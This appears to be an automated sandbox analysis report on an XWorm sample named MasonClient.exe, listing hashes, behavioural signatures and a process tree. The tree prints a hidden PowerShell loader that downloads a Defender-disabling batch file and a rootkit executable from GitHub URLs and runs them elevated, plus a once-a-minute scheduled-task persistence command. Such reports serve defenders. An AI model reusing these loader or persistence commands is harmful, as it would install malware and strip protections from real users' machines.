Analysis
-
max time kernel
144s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
08/03/2025, 07:46
Behavioral task
behavioral1
Sample
MasonClient.exe
Resource
win7-20240903-en
General
-
Target
MasonClient.exe
-
Size
51KB
-
MD5
98b0077862a1b5e9cfb7257a96abfbf2
-
SHA1
c608b9257f5eb5c547875a38b27567ff1fd3fe44
-
SHA256
0f4691e7c8b5f9bbd913c207f7d57f3b514e6adee47b32d57ebe0665632a8aac
-
SHA512
0f80ea3b6e04af7dc96f085b318a0b8736dfc72a7d8ac73d86a31023f895be9c3e4cbbef00da507494c3e19a7c376661ed0b91cbf11aef5e1590e3b6c271a846
-
SSDEEP
1536:IUIPbL8Z6az90D7h47T7baurM+/MbOTuL:IUIPHA6az903y7fbae/MbOiL
Malware Config
Extracted
https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe
https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/main/source.bat
Extracted
xworm
-
install_file
USB.exe
Signatures
-
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral2/memory/1120-1-0x0000000000650000-0x0000000000664000-memory.dmp family_xworm behavioral2/files/0x000600000001da5d-136.dat family_xworm -
Xworm family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2860 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation MasonClient.exe -
Executes dropped EXE 3 IoCs
pid Process 1700 MasonClient.exe 3440 MasonClient.exe 2112 MasonClient.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs
flow ioc 15 raw.githubusercontent.com 27 raw.githubusercontent.com 29 raw.githubusercontent.com 32 raw.githubusercontent.com 21 raw.githubusercontent.com 23 raw.githubusercontent.com 25 raw.githubusercontent.com 31 raw.githubusercontent.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2992 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 2860 powershell.exe 2860 powershell.exe 1644 msedge.exe 1644 msedge.exe 1632 msedge.exe 1632 msedge.exe 612 msedge.exe 612 msedge.exe 3612 identity_helper.exe 3612 identity_helper.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
pid Process 1632 msedge.exe 1632 msedge.exe 1632 msedge.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 1120 MasonClient.exe Token: SeDebugPrivilege 2860 powershell.exe Token: SeDebugPrivilege 1700 MasonClient.exe Token: SeDebugPrivilege 3440 MasonClient.exe Token: SeDebugPrivilege 2112 MasonClient.exe -
Suspicious use of FindShellTrayWindow 34 IoCs
pid Process 1632 msedge.exe 1632 msedge.exe 1632 msedge.exe 1632 msedge.exe 1632 msedge.exe 1632 msedge.exe 1632 msedge.exe 1632 msedge.exe 1632 msedge.exe 1632 msedge.exe 1632 msedge.exe 1632 msedge.exe 1632 msedge.exe 1632 msedge.exe 1632 msedge.exe 1632 msedge.exe 1632 msedge.exe 1632 msedge.exe 1632 msedge.exe 1632 msedge.exe 1632 msedge.exe 1632 msedge.exe 1632 msedge.exe 1632 msedge.exe 1632 msedge.exe 1632 msedge.exe 1632 msedge.exe 1632 msedge.exe 1632 msedge.exe 1632 msedge.exe 1632 msedge.exe 1632 msedge.exe 1632 msedge.exe 1632 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 1632 msedge.exe 1632 msedge.exe 1632 msedge.exe 1632 msedge.exe 1632 msedge.exe 1632 msedge.exe 1632 msedge.exe 1632 msedge.exe 1632 msedge.exe 1632 msedge.exe 1632 msedge.exe 1632 msedge.exe 1632 msedge.exe 1632 msedge.exe 1632 msedge.exe 1632 msedge.exe 1632 msedge.exe 1632 msedge.exe 1632 msedge.exe 1632 msedge.exe 1632 msedge.exe 1632 msedge.exe 1632 msedge.exe 1632 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1120 wrote to memory of 2860 1120 MasonClient.exe 91 PID 1120 wrote to memory of 2860 1120 MasonClient.exe 91 PID 1632 wrote to memory of 3524 1632 msedge.exe 97 PID 1632 wrote to memory of 3524 1632 msedge.exe 97 PID 1632 wrote to memory of 4428 1632 msedge.exe 98 PID 1632 wrote to memory of 4428 1632 msedge.exe 98 PID 1632 wrote to memory of 4428 1632 msedge.exe 98 PID 1632 wrote to memory of 4428 1632 msedge.exe 98 PID 1632 wrote to memory of 4428 1632 msedge.exe 98 PID 1632 wrote to memory of 4428 1632 msedge.exe 98 PID 1632 wrote to memory of 4428 1632 msedge.exe 98 PID 1632 wrote to memory of 4428 1632 msedge.exe 98 PID 1632 wrote to memory of 4428 1632 msedge.exe 98 PID 1632 wrote to memory of 4428 1632 msedge.exe 98 PID 1632 wrote to memory of 4428 1632 msedge.exe 98 PID 1632 wrote to memory of 4428 1632 msedge.exe 98 PID 1632 wrote to memory of 4428 1632 msedge.exe 98 PID 1632 wrote to memory of 4428 1632 msedge.exe 98 PID 1632 wrote to memory of 4428 1632 msedge.exe 98 PID 1632 wrote to memory of 4428 1632 msedge.exe 98 PID 1632 wrote to memory of 4428 1632 msedge.exe 98 PID 1632 wrote to memory of 4428 1632 msedge.exe 98 PID 1632 wrote to memory of 4428 1632 msedge.exe 98 PID 1632 wrote to memory of 4428 1632 msedge.exe 98 PID 1632 wrote to memory of 4428 1632 msedge.exe 98 PID 1632 wrote to memory of 4428 1632 msedge.exe 98 PID 1632 wrote to memory of 4428 1632 msedge.exe 98 PID 1632 wrote to memory of 4428 1632 msedge.exe 98 PID 1632 wrote to memory of 4428 1632 msedge.exe 98 PID 1632 wrote to memory of 4428 1632 msedge.exe 98 PID 1632 wrote to memory of 4428 1632 msedge.exe 98 PID 1632 wrote to memory of 4428 1632 msedge.exe 98 PID 1632 wrote to memory of 4428 1632 msedge.exe 98 PID 1632 wrote to memory of 4428 1632 msedge.exe 98 PID 1632 wrote to memory of 4428 1632 msedge.exe 98 PID 1632 wrote to memory of 4428 1632 msedge.exe 98 PID 1632 wrote to memory of 4428 1632 msedge.exe 98 PID 1632 wrote to memory of 4428 1632 msedge.exe 98 PID 1632 wrote to memory of 4428 1632 msedge.exe 98 PID 1632 wrote to memory of 4428 1632 msedge.exe 98 PID 1632 wrote to memory of 4428 1632 msedge.exe 98 PID 1632 wrote to memory of 4428 1632 msedge.exe 98 PID 1632 wrote to memory of 4428 1632 msedge.exe 98 PID 1632 wrote to memory of 4428 1632 msedge.exe 98 PID 1632 wrote to memory of 1644 1632 msedge.exe 99 PID 1632 wrote to memory of 1644 1632 msedge.exe 99 PID 1632 wrote to memory of 4520 1632 msedge.exe 100 PID 1632 wrote to memory of 4520 1632 msedge.exe 100 PID 1632 wrote to memory of 4520 1632 msedge.exe 100 PID 1632 wrote to memory of 4520 1632 msedge.exe 100 PID 1632 wrote to memory of 4520 1632 msedge.exe 100 PID 1632 wrote to memory of 4520 1632 msedge.exe 100 PID 1632 wrote to memory of 4520 1632 msedge.exe 100 PID 1632 wrote to memory of 4520 1632 msedge.exe 100 PID 1632 wrote to memory of 4520 1632 msedge.exe 100 PID 1632 wrote to memory of 4520 1632 msedge.exe 100 PID 1632 wrote to memory of 4520 1632 msedge.exe 100 PID 1632 wrote to memory of 4520 1632 msedge.exe 100 PID 1632 wrote to memory of 4520 1632 msedge.exe 100 PID 1632 wrote to memory of 4520 1632 msedge.exe 100 PID 1632 wrote to memory of 4520 1632 msedge.exe 100 PID 1632 wrote to memory of 4520 1632 msedge.exe 100 PID 1632 wrote to memory of 4520 1632 msedge.exe 100 PID 1632 wrote to memory of 4520 1632 msedge.exe 100 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\MasonClient.exe"C:\Users\Admin\AppData\Local\Temp\MasonClient.exe"1⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1120 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "$settings = '{\"WD\": false, \"adminrun\": false}' | ConvertFrom-Json; $randomString = \"2PewmOBXXq\"; if ($settings.WD) { $settings.adminrun = $true; (New-Object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/main/source.bat\", $env:TEMP + '\' + $randomString + '.bat'); Start-Process -FilePath ($env:TEMP + '\' + $randomString + '.bat') -WindowStyle Hidden -Wait -Verb RunAs; }; if ($settings.adminrun) { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath -Verb RunAs; } else { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath; }"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2860
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "MasonClient" /tr "C:\Users\Admin\AppData\Roaming\MasonClient.exe"2⤵
- Scheduled Task/Job: Scheduled Task
PID:2992
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" C:\Users\Admin\Desktop\TraceInvoke.docm1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1632 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff8458646f8,0x7ff845864708,0x7ff8458647182⤵PID:3524
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1948,6262062516685861519,7886867976925246132,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2076 /prefetch:22⤵PID:4428
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1948,6262062516685861519,7886867976925246132,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:1644
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1948,6262062516685861519,7886867976925246132,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2828 /prefetch:82⤵PID:4520
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,6262062516685861519,7886867976925246132,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:12⤵PID:4968
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,6262062516685861519,7886867976925246132,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:12⤵PID:760
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1948,6262062516685861519,7886867976925246132,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4584 /prefetch:82⤵PID:836
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,6262062516685861519,7886867976925246132,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4516 /prefetch:12⤵PID:1316
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1948,6262062516685861519,7886867976925246132,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3260 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:612
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1948,6262062516685861519,7886867976925246132,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4872 /prefetch:82⤵PID:2788
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1948,6262062516685861519,7886867976925246132,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4872 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3612
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2720
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1456
-
C:\Users\Admin\AppData\Roaming\MasonClient.exeC:\Users\Admin\AppData\Roaming\MasonClient.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1700
-
C:\Users\Admin\AppData\Roaming\MasonClient.exeC:\Users\Admin\AppData\Roaming\MasonClient.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3440
-
C:\Users\Admin\AppData\Roaming\MasonClient.exeC:\Users\Admin\AppData\Roaming\MasonClient.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2112
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
654B
MD52ff39f6c7249774be85fd60a8f9a245e
SHA1684ff36b31aedc1e587c8496c02722c6698c1c4e
SHA256e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
SHA5121d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1
-
Filesize
152B
MD53c6e13dc1762aa873320bed152204f3c
SHA138df427d38ca5ce6ce203490a9fb8461c7444e12
SHA2565c441148843b7c8dbff4c4a72962a532aaf0bdd484d07a03dd9a32fd461b1371
SHA512133054cb042e11013bfdad1bd11e3407d08cf26a66d0743bea9708d261aa904a1047bb0097b187ecf8436cb6cff3bec28c89e435862cad0e0fa264799556b70c
-
Filesize
152B
MD5f5da507c2059b715761792e7106405f0
SHA1a277fd608467c5a666cf4a4a3e16823b93c6777f
SHA2568c1d99de087ac5f2e7b2afce66eff36a646bef46800c0c1d7737d6f0df74b7e8
SHA51201c92729dd8061aa122b116a674c73bb78016f66d2cb8f7fb64907352758a825e87a1e345334386440699d2a6d1e17baccb400c5aee151eb64e64019cbebb870
-
Filesize
6KB
MD55a4a05cf69bf62eca101125dc07bc571
SHA178e4c4a4dd635db783ddca9987bfe14c995acf62
SHA25655a68058730a9b4af34243ba846ef49e9a5b57132d9969539c2ee5f22cf140f5
SHA5123f1a933c0c73b68956b8258f01c8accc212b1839b4a0b4d0b27d6b0374d74f2915973c6862d570180789c231cc9123c525e7b31164abe393a24c1a6fd693ebf7
-
Filesize
6KB
MD534342ca277f0d121a6530afa3ad985b3
SHA149ecd68f8171f467779035d619a98a6601efc28c
SHA2561e38f6077281f991383ebf81ae83550f80440dc270b5bc3fca39f6e3346d79d2
SHA51269c4d93c68f8adf906acea5a1b55c52cea87ecf226ca3ff62f44491fd80e14b897aff0816dd71a3757e5303f97eb366ae7cf0a54b2df70d4a0ca23f32116aaa2
-
Filesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
Filesize
8KB
MD583de37260afa9a01d6ca0ae6adb570a1
SHA1a4a75875fa09bc825c211d4129588cb9fdda653f
SHA2566bfdc8f01951136f2aa8eead1077f54dc16f20c42db7a4a09e4924ea0c361abf
SHA512849397891994a880571bccb4c1e0b1dcf83d52280867c49aaf759f82d416681da9b4569caeccc6314a999e71005a9dd044049e2824488f6c3e7fd26b0e73b39c
-
Filesize
264KB
MD5f50f89a0a91564d0b8a211f8921aa7de
SHA1112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
51KB
MD598b0077862a1b5e9cfb7257a96abfbf2
SHA1c608b9257f5eb5c547875a38b27567ff1fd3fe44
SHA2560f4691e7c8b5f9bbd913c207f7d57f3b514e6adee47b32d57ebe0665632a8aac
SHA5120f80ea3b6e04af7dc96f085b318a0b8736dfc72a7d8ac73d86a31023f895be9c3e4cbbef00da507494c3e19a7c376661ed0b91cbf11aef5e1590e3b6c271a846